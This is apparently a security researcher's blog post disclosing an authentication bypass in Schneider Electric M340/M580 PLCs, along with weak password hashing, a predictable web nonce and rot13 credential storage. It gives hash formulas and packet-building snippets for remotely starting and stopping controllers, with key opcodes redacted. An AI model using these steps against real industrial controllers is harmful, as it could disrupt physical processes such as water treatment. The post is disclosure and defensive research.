The recent cyber security enhancements in the M340 firmware (from version 3.01 on 2/2019 and onward) are designed to prevent a remote attacker from executing certain functions on the controller, such as starting and stopping the runtime, reading and writing variables or system bits (to control the program execution), or even uploading a new project to the controller if an application password is configured under the “Project & Controller Protection” tab in the project properties. Due to it being improperly implemented, it is possible to start and stop the controller without this password, as well as perform other control functions protected by the cyber security feature.

Auth Bypass

When connecting to a PLC, the client sends a request to read memory block <redacted> on the PLC before any authentication is performed. This block appears to contain information about the project (such as the project name, version, and file path to the project on the engineering station) and authentication information as well.

<redacted> memory block, containing authentication hashes

Here, “TenableFactory” is the project name. “AGC7MAIWE” is the “Crypted” program and safety project password. The base64 string is used afterwards to verify the application password. This is done as follows:

The actual password is only checked on the client side. To negotiate an authenticated session, or “reservation” first you need to generate a 32 byte random nonce (which is a term for a random number generated once each session), send it to the server, and get one back. This is done through a new type of UMAS packet introduced with the cyber security upgrades, which is <redacted>. I’ve highlighted the nonces (client followed by server) exchanged below:

The next step is to make a reservation using packet type <redacted>. With the new cyber security enhancements, in addition to the computer name of the connecting host, an ASCII sha256 hash is also appended:

This hash is generated as follows:

SHA256 (server_nonce + base64_str + client_nonce)

The base64 string is from the first block <redacted> read and in this case would be:


You do not need to know the actual password to generate this SHA256.

The response contains a byte at the end (here it is 0xc9) that needs to be included after the 0x5a in protected requests (such as starting and stopping the PLC runtime).

To generate a request to a protected function (such as start PLC runtime) you first start with the base request:

# start PLC request
to_send = “\x5a” + check_byte + “\x40\xff\x00”

check_byte in this case would be 0xc9 from the reservation request response. You then calculate two hashes:

auth_hash_pre = sha256(hardware_id + client_nonce).digest()
auth_hash_post = sha256(hardware_id + server_nonce).digest()

hardware_id can be obtained by issuing an info request (0x02):

Here the hardware_id is 06 01 03 01.

Once you have the hashes above, you calculate the “auth” hash as follows:

auth_hash = (sha256(auth_hash_pre + to_send + auth_hash_post).digest())

The complete packet (without modbus header) is built as follows:

start_plc_pkt = (“\x5a” + check_byte + “\x38\01” + auth_hash + to_send)

Put everything together in a PoC and you can do things like start and stop controllers remotely:

Proof of Concept in action

A complete PoC ( can be found here:


Here is a demo video of the exploit in action, against a model water treatment plant:

Ideally, the controller itself should verify the password. Using a temporal key-exchange algorithm such as Diffie-Hellman to negotiate a pre-shared key, the password could be encrypted using a cipher such as AES and securely shared with the controller for evaluation. Better yet, certificate authentication could be implemented which would allow access to be easily revoked from one central location.

Program and Safety Password

If the Crypted box is checked, a weak, unknown, non-cryptographically sound custom algorithm is used, which reveals the length of the password (the length of hash = length of password).

Program and Safety Protection Password Crypted Option

If the “Crypt” box isn’t checked, this password is in plaintext which is a password disclosure issue.

Here is a reverse engineered implementation I wrote in python:

This appears to be a custom hashing function, as I couldn’t find anything similar to it during my research. There are a couple of issues I’ve noticed. First, the length of the hash matches the length of the password, revealing the password length. Secondly, the hash itself is limited in characters (A-Z and 0–9) which is likely to lead to hash collisions. It is easily possible to find two plaintext messages that hash to the same value, especially with smaller passwords. For example, ‘acq’, ‘asq’, ‘isy’ and ‘qsq’ all hash to ‘5DF’.

Firmware Web Server Errata

Here are a few things I noticed while examining the controller firmware, specifically having to do with the built-in PLC web server they call FactoryCase. This is not enabled by default.

Predictable Web Nonce

The web nonce is calculated by concatenating a few time stamps to a hard coded string. Therefore, it would be possible to predict what values the nonce might be within a certain time frame.

The proper way to calculate a nonce would be to use a proper cryptographic random number generator.

Rot13 Storage of Web Password Data

It appears that the plaintext web username and password is stored somewhere locally on the controller using rot13. Ideally, these should be stored using a salted hash. If the controller was stolen, it might be possible for an attacker to recover this password.


What at the surface looks like authentication, especially when viewing a packet capture, actually isn’t when you dig into the details. Some critical errors were made and not caught during the design and testing of the authentication mechanisms. More oversight and auditing is needed for the security mechanisms in critical products such as this. It’s as critical as the water proofing, heat shielding, and vibration hardening in the hardware. These enhancements should not have made it past critical design review.

This goes back to a core tenet of security that you can’t trust a client. You have to verify every interaction server side. You can not rely on client side software (a.k.a “Engineering Station”) to do the security checks. This verification needs to be done at every level, all the way down to the PLCs.

Another tenet violated would be to not roll your own crypto. There are tons of standard cryptographic algorithms implemented in well tested and designed libraries, and published authentication standards that are easy enough to borrow. You will make a mistake trying to implement it yourself.

We disclosed the vulnerability to Schneider Electric in May 2021. As per, the vulnerability was first reported to Schneider in Fall 2020. In the interest of keeping sensitive systems “safer”, we have had to redact multiple opcodes and PoC code from the blog as this is one of those rarest of rare cases where full disclosure couldn’t be followed. After many animated internal discussions, we had to take this step even though we are proponents of full disclosure. Schneider hasn’t provided an ETA yet on when this issue would be fixed, saying that it is still many months out. We were also informed that five other researchers have co-discovered and reported this issue.

While vendors are expected to patch within 90 days of disclosure, the ICS industry as a whole hasn’t evolved to the extent it should have in terms of security maturity to meet these expectations. Given the sensitive industries where the PLCs are deployed, one would imagine that we would have come a long way by now in terms of elevating the security posture. Prioritizing and funding a holistic Security Development Lifecycle (SDL) is key to reducing cyber exposure and raising the bar for attackers.. However, many of these systems are just sitting there unguarded and in some cases, without anyone aware of the potential danger.

See for Schneider Electrics advisory.

See for ICS-CERTs advisory.

Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
